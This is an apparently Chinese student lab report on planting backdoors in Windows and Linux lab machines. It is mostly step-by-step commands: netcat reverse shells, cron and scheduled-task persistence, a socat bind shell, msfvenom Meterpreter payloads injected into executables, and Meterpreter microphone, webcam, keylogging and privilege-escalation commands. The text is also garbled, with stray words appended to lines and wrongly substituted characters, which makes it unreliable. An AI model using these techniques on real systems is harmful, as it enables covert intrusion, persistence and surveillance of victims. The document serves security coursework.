返回目录html
例举你能想到的一个后门进入到你系统中的可能方式?linux
有时在网页版下载软件的安装包时,会藏有后门程序,当启动安装包进行安装,后门就潜入到系统中。web
例举你知道的后门如何启动起来(win及linux)的方式?shell
- 假装成经常使用软件,诱使用户点击
- 远程监遵从而反向链接被控主机,发送后门,控制后门启动
- linux的cron程序被修改,使得自动定时执行后门程序
Meterpreter有哪些给你映像深入的功能?windows
能够获取被控主机的音频文件、开启摄像头和录像功能,捕获画面。安全
如何发现本身有系统有没有被安装后门?tcp
- 按期用电脑所下载的杀毒软件对系统进行检测,及时处理可疑程序
- 开启防火墙,查看开启的端口及对应的进程,通常不是系统默认开启的端口都是可疑的,再结合对应进程的抓包查看通讯数据分析是否为后门。
返回目录编辑器
ncat
,可使用man netcat
或man nc
可查看其使用说明ncat.exe -l -p 5330
nc 192.168.56.1 5330 -e /bin/sh
(IP为win IP)ls
nc -l -p 5330
ncat.exe -e cmd.exe 192.168.107.128 5330
(IP为Linux IP)ncat.exe -l -p 5330
ncat 192.168.56.1 5330
(IP为win IP)socat
是ncat
的加强版,它使用的格式是socat [options] <address> <address>
,其中两个address
是必选项,而options
是可选项。socat
的基本功能就是创建两个双向的字节流,数据就在其间传输,参数address就是表明了其中的一个方向。所谓流,表明了数据的流向,而数据则能够有许多不一样的类型,命令中也就相应须要许多选项对各类不一样的类型数据流进行限定与说明。msfvenom -p windows/meterpreter/reverse_http lhost=192.168.56.1 lport=5330 -f c
(IP为Win IP)生成shellcode,注入到可执行文件,执行时回连攻击主机。返回目录工具
ipconfig
查看Windows的IP地址为192.168.56.1
ncat.exe -l 5330
监听5330
端口crontab -e
指令编辑一条定时任务,选择编辑器时选择"3",在底行插入30 * * * * /bin/netcat 192.168.56.1 5330 -e /bin/sh
(意为在每一个小时的第30分钟反向链接Windows的5330端口):wq
保存退出配置即生效,可经过crontab -l
查看右键
-计算机管理
-任务计划程序
-建立任务
常规
中填写任务名称后(我填写了win),触发器
-新建
新建触发器,而后肯定操做
-新建
,导入你所下载解压后的socat.exe
的路径,在添加参数
中填入tcp-listen:5330 exec:cmd.exe,pty,stderr
(意为把cmd.exe
绑定到端口5330
,同时把cmd.exe
的stderr
重定向到stdout
上)Windows+L
快捷键锁定计算机,再次打开时,双击任务计划程序库
能够发现以前建立的任务已经开始运行socat - tcp:192.168.56.1:5330
(-
表明标准的输入输出,第二个流链接到Windows主机的5330端口,IP为windows的IP),接着能够发现已经成功得到一个cmd shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.246.128 LPORT=5330 -f exe > 20165330_backdoor.exe
(IP为kali的IP)生成后门程序20165330_backdoor.exe
ncat.exe -lv 5330 > 20165330_backdoor.exe
查看链接状态nc 192.168.56.1 5330 < 20165330_backdoor.exe
(此处的IP为Windows的IP)将生成的后门程序传送到Windows主机上msfconsole
进入msf控制台use exploit/multi/handler
使用监听模块,设置payloadset payload windows/meterpreter/reverse_tcp
set LHOST 192.168.246.128
此处为kali的IP(和生成后门程序时指定的IP相同)set LPORT 5330
exploit
开始监听ctrl+c
退出上条命令,在执行:20165330_backdoor.exe
(注意电脑的防火墙和杀毒软件要关掉),发现kali得到Windows主机的链接,而且获得了远程控制的shellexploit
record_mic
能够截获一段音频webcam_snap
可使用摄像头进行拍照screenshot
能够进行截屏keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录getuid
查看当前用户,使用getsystem
进行提权参考博客:任胤同窗博客,学姐博客,msfvenom命令说明
第一种:ui
- 这里是kali本身监听本身,首先生成一段
shellcode
:msfvenom -p linux/x86/meterpreter/shell_reverse_tcp -b '\x00\x0a\0d' LHOST=192.168.246.128 LPORT=5330 -f c
(IP为kali本身的IP)
- 使用实验一中的第三部分步骤将生成的
shellcode
注入到pwn1
中(注意去掉引号和空格),步骤点这里,随后找到shellcode地址
为0xffffd370
- 注入成功后,kali中打开新的终端,输入
msfconsole
进入MSF控制台
- 输入
use exploit/multi/handler
使用监听模块,设置payload- 使用和生成后门程序时相同的payload:
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.246.128
此处为kali的IP(和生成后门程序时指定的IP相同)- 端口号也相同:
set LPORT 5330
- 设置完成后,
exploit
开始监听
- 旧的终端中运行
pwn1
:(cat input_shellcode;cat) | ./pwn1
- 发现没有反应。。。缘由在于生成的
shellcode
有问题。。
第二种:
- MSF能够实现直接将shellcode注入可执行文件
- 使用命令
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.246.128 LPORT=5330 -x /root/pwn2 -f elf > pwn3
(-x
参数为指定一个自定义的可执行文件做为模板,这里将shellcode
弄到pwn1
模板中)
msfconsole
进入MSF控制台
- 输入
use exploit/multi/handler
使用监听模块,设置payload- 使用和生成后门程序时相同的payload:
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.246.128
此处为kali的IP(和生成后门程序时指定的IP相同)- 端口号也相同:
set LPORT 5330
- 设置完成后,
exploit
开始监听- 加权限运行
pwn3
- 获得shell命令
第三种(符合要求的)
- 在官网下载生成好的shellcode
- 将其中的code部分注入
pwn1
- 打开新的终端进入msf控制台:
msfconsole
- 输入
use exploit/multi/handler
使用监听模块,设置payload- 使用和生成后门程序时相同的payload:
set payload linux/x86/shell_reverse_tcp
set LHOST 127.0.0.1
此处为kali的IP(和生成后门程序时指定的IP相同)- 端口号也相同:
set LPORT 4444
- 设置完成后,
exploit
开始监听
- 执行:
(cat input_shellcode;cat) | ./pwn1
(注意回车)
- 发现已得到shell
ps:若是没成功把注入的部分从头开始再找一遍地址从头开始注入
在进入msf控制台时,发现进入不了,出现如下错误
解决办法:我一开始成功进入之后,又退出,后面重复屡次生成后门程序,可能这其中致使程序再也不是原始的,我将两边的程序都删除后,重启电脑在从新按步骤后成功。
在进入msf控制台后,进入监听是报错,出现Session manipulation failed: Cannot allocate memory
解决办法:该错误是提示没法分配内存,我设置的内存是1G,将虚拟机关机,进入
虚拟机
-设置
-内存
,将内存改大一倍在开启虚拟机便可。